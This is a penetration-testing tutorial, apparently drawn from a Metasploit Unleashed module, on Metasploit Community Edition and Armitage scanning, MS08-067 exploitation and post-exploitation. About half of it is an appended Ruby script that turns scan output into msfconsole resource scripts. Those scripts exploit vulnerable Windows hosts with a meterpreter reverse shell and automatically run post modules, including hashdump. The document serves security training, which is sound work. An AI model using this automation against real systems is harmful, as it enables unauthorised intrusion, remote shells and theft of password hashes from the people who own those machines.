The Metasploit framework has become the tool of choice for many penetration testers around the globe. With the release of Metasploit Community Edition, a novice user is just a few clicks away from successful exploitation of many vulnerable targets.
In this module, we will discuss the differences between Metasploit Community Edition and Metasploit Pro, the commercial version of Metasploit, and walk through the installation and activation of Metasploit Community Edition. Scanning, exploitation and post-exploitation with the Community Edition will also be covered!
MSF Community Edition
When it comes to vulnerability verification, penetration testers often have an array of tools at their disposal. Metasploit Community Edition provides a graphical user interface (GUI) that simplifies network discovery and verification of specific vulnerabilities with a working exploit, complementing vulnerability scanners such as Nessus and Nexpose, whose findings are otherwise only signature matches.
MSF Community Scanning
Scanning is an essential part of penetration testing. Oftentimes, testers go straight to exploitation because they have already been given the IP address range used by the organization. This is a critical mistake: they have not yet discovered all of the live hosts or open services. Continuing a penetration test without a solid understanding of all of the live hosts, open services and operating systems in the environment will often crash production systems, since exploits are fired at targets they were never meant for. Clearly, we would like to avoid having to explain to the CIO or CISO how we crashed multiple production systems.
MSF Community Exploitation
So here it is, the exploitation phase! Now that a number of vulnerabilities have been discovered, we can proceed to the fun part: exploiting them.
MSF Community Post Exploitation
A number of penetration testers stop at this point since they have obtained a shell with administrative access on the target machine. This is a huge mistake, since post-exploitation is just as important as getting that initial shell. Information gathered at this stage can be used to gain access to an organization’s crown jewels. With a session already established with the target machine, we simply click on the Session #, which is 3 in this case.
Armitage is a fantastic GUI front-end for the Metasploit Framework developed by Raphael Mudge with the goal of helping security professionals better understand hacking and to help them realize the power of Metasploit. Further information about this excellent project can be obtained at Armitage’s Official Website.
Armitage is included in BackTrack, so all we need to do is run “armitage” from any command prompt.
To select a scan we wish to run with Armitage, we expand the module tree and double-click on the scanner we wish to use, in this case, “smb_version”, and set our RHOSTS target range.
In the scan we conducted earlier, we see that one of our targets is running Windows XP SP2 so we will attempt to run the exploit for MS08-067 against it. We select the host we would like to attack, find the exploit in the tree, and double-click on it to bring up the configuration for it.
Armitage Post Exploitation
Oftentimes, penetration testers get so carried away with their initial shell that they forget to perform a thorough check on the machine. They could be attacking a honeypot and would not even know it. This is why post-exploitation is essential to every penetration test. Let us explore how we can run post-exploitation modules through Armitage.
With shell access to the machine, post exploitation becomes relatively easy. We simply select the post exploitation module we’d like to run by double-clicking on it, and then click on ‘Launch’.
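Every click above (the smb_version scan, the MS08-067 exploit against the Windows XP SP2 host, and launching a post module in session 3) maps onto msfconsole commands that Armitage and the Community Edition issue for you. The Ruby script below is an added example, not code from Metasploit Unleashed or from the Metasploit project: it parses smb_version-style scanner output, picks out the hosts whose OS fingerprint is in MS08-067's scope, and emits resource scripts for msfconsole. The module names, the `AutoRunScript` option and the `-r` flag are real Metasploit ones; the scanner lines, IP addresses and the LHOST value are constructed sample data.

```ruby
#!/usr/bin/env ruby
# Added example (not from the Metasploit Unleashed page or the Metasploit project).
# Turns smb_version output into msfconsole resource scripts: one that runs
# `check` against MS08-067 candidates, one that exploits the confirmed hosts
# and runs a post module as soon as the Meterpreter session opens.

# Constructed sample output in the style smb_version prints, one host per line.
SAMPLE_SCAN = <<~OUT
  [*] 192.168.1.201:445 is running Windows XP Service Pack 2 (language: English) (name:XPBOX) (domain:WORKGROUP)
  [*] 192.168.1.202:445 is running Windows 7 Ultimate 7600 (language: Unknown) (name:WIN7) (domain:WORKGROUP)
  [*] 192.168.1.203:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
  [*] 192.168.1.204:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:DC01) (domain:LAB)
  [*] Scanned 4 of 4 hosts (100% complete)
OUT

# Accepts both the older "ip:port is running ..." and the newer
# "ip:port - Host is running ..." line shapes.
SMB_LINE = /\A\[[*+]\]\s+(?<ip>\d{1,3}(?:\.\d{1,3}){3}):(?<port>\d+)\s+(?:-\s+Host\s+)?is running (?<os>.+)\z/

# MS08-067 (netapi32 NetPathCanonicalize) affects Windows 2000, XP and Server 2003 only.
# A matching fingerprint means "in scope", not "unpatched": that is what `check` is for.
MS08_067_OS = /Windows (?:2000|XP|2003)\b/

Host = Struct.new(:ip, :port, :os)

# Parse scanner output into Host records; progress lines are skipped.
def parse_smb_version(output)
  output.each_line.map do |line|
    m = SMB_LINE.match(line.strip) or next
    Host.new(m[:ip], m[:port].to_i, m[:os].strip)
  end.compact
end

def ms08_067_candidates(hosts)
  hosts.select { |h| h.port == 445 && MS08_067_OS.match?(h.os) }
end

# action: :check emits a check-only script; :exploit fires the exploit as a
# background job. A resource script runs line by line and never branches on
# the verdict of `check`, so run the :check script first and feed only the
# hosts reported as vulnerable back in with action: :exploit.
def exploit_resource(hosts, lhost:, action: :exploit, post_module: 'post/windows/gather/checkvm')
  lines = ['use exploit/windows/smb/ms08_067_netapi',
           'set PAYLOAD windows/meterpreter/reverse_tcp',
           "set LHOST #{lhost}"]
  # AutoRunScript is the Meterpreter payload option that runs a script or post
  # module automatically when the session opens (the honeypot/VM check first).
  lines << "set AutoRunScript #{post_module}" if action == :exploit
  hosts.each do |h|
    lines << "set RHOST #{h.ip}"
    lines << (action == :check ? 'check' : 'exploit -j -z')
  end
  lines.join("\n") + "\n"
end

# The manual route from the page: pick a post module, point it at a session, run it.
def post_resource(session_id, modules)
  modules.flat_map { |m| ["use #{m}", "set SESSION #{session_id}", 'run'] }.join("\n") + "\n"
end

if $PROGRAM_NAME == __FILE__
  candidates = ms08_067_candidates(parse_smb_version(SAMPLE_SCAN))
  File.write('ms08_067_check.rc',   exploit_resource(candidates, lhost: '192.168.1.100', action: :check))
  File.write('ms08_067_exploit.rc', exploit_resource(candidates, lhost: '192.168.1.100'))
  File.write('post_session3.rc',    post_resource(3, %w[post/windows/gather/checkvm post/windows/gather/hashdump]))
  puts "candidates: #{candidates.map(&:ip).join(', ')}"
end
```

Run the generated scripts with `msfconsole -r ms08_067_check.rc`, read which hosts `check` reports as vulnerable, then run the exploit script; `post_session3.rc` is the console equivalent of double-clicking a post module and pressing Launch with session 3 selected.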